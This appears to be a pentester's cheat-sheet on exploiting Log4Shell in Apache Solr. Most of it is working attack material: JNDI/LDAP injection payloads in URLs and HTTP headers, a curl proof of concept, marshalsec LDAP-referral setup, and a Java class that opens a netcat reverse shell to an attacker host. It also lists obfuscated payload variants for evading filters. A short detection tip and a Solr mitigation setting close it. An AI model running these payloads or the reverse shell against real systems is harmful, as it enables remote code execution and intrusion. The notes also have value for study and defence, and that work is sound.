3.1 KiB
3.1 KiB
Log4Shell
-
log4j
< version 2.15.0rc2 -
Code inside a
param
value is parsed and a${payload}
will be executed, for example
${sys:os.name}
${sys:user.name}
${log4j:configParentLocation}
${ENV:PATH}
${ENV:HOSTNAME}
${java:version}
Java Naming and Directory Interface JNDI
- Vulnerability can be exploited via
${jndi:ldap://<attacker-IP>/foo}
POC
curl 'http://$TARGET:8983/solr/admin/cores?foo=?$\{jndi:ldap://$ATTACKER_IP:4449\}'
- Use HTTP header field as storage for payload or any other possible input field
X-Forwarded-For: ${jndi:ldap://$ATTACKER_IP:1389/foo}
Accept: ${jndi:ldap://$ATTACKER_IP:1389/foo}
X-Api-Version: ${jndi:ldap://$ATTACKER_IP:1389/foo}
Usage
-
Fuzz endpoints to applicate the exploit on
-
Clone and build marshallsec via
mvn clean package -DskipTests
-
Java version should be the same as the one on the target
-
A Proxy LDAP server to an HTTP server is needed
-
Compile following Java reverse shell via
javac Exploit.java -source 8 -target 8
to Exploit.class
public class Exploit {
static {
try {
java.lang.Runtime.getRuntime().exec("nc -e /bin/bash $ATTACKER_IP 4449");
} catch (Exception e) {
e.printStackTrace();
}
}
}
- Run the LDAP, HTTP and reverse shell
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://$ATTACKER_IP:8000/#Exploit"
php -S 0.0.0.:8000
nc -lvnp 4449
- Trigger via
curl 'http://$TARGET:8983/solr/admin/cores?foo=$\{jndi:ldap://$ATTACKER_IP:1389/Exploit\}'
Detection
-
Parse logs for
jndi
Obfuscation
- Possible bypasses are as follows
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//attackerendpoint.com/}
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attackerendpoint.com/}
${${upper:j}ndi:${upper:l}${upper:d}a${lower:p}://attackerendpoint.com/}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attackerendpoint.com/z}
${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attackerendpoint.com/}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://attackerendpoint.com/}
${${::-j}ndi:rmi://attackerendpoint.com/}
Mitgation
- Apache Solr security news
- Add the following line to
solr.in.sh
SOLR_OPTS="$SOLR_OPTS -Dlog4j2.formatMsgNoLookups=true"
10.10.90.21210.10.90.212